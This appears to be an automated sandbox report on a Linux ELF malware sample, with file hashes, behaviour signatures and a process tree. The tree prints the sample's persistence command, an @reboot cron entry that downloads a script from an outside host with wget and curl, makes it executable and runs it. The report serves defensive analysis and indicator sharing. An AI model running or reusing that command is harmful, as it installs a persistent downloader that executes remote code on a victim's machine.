Analysis

  • max time kernel
    130s
  • max time network
    136s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
  • submitted
    28-10-2024 02:24

General

  • Target

    3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf

  • Size

    93KB

  • MD5

    bb9275394716c60d1941432c7085ca13

  • SHA1

    43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc

  • SHA256

    3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615

  • SHA512

    047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d

  • SSDEEP

    1536:lDVOLhrwmN92XVNbMxvk2bB3n2GNR9maOY7h8RGEhXXBP:9VO9v4vbMxvkEB3VNR9u4h8RGaxP

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Changes its process name 1 IoCs

Processes

  • /tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf
    /tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf
    1⤵
    • Renames itself
    • Changes its process name
    PID:1570
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:1571
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        PID:1573
      • /usr/bin/crontab
        crontab -l
        3⤵
          PID:1574

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • /var/spool/cron/crontabs/tmp.HAq4X7

      Filesize

      306B

      MD5

      3afbea3182e7ee7d34038d10c18b2ac4

      SHA1

      1d2168cb7cd54872f95082bb778efe16868150e5

      SHA256

      7f6dd9d0683c71dd02243f3500f06d58969859be09dac2e3d048b0300481033b

      SHA512

      8cc16b8c01cab818044dc49be83acf28fa7a0f5eda0b05fb87832478caccf35fd58f4b4b132b10045d9210e6287a2674f8b3002de5b78834e5f58f0922334b01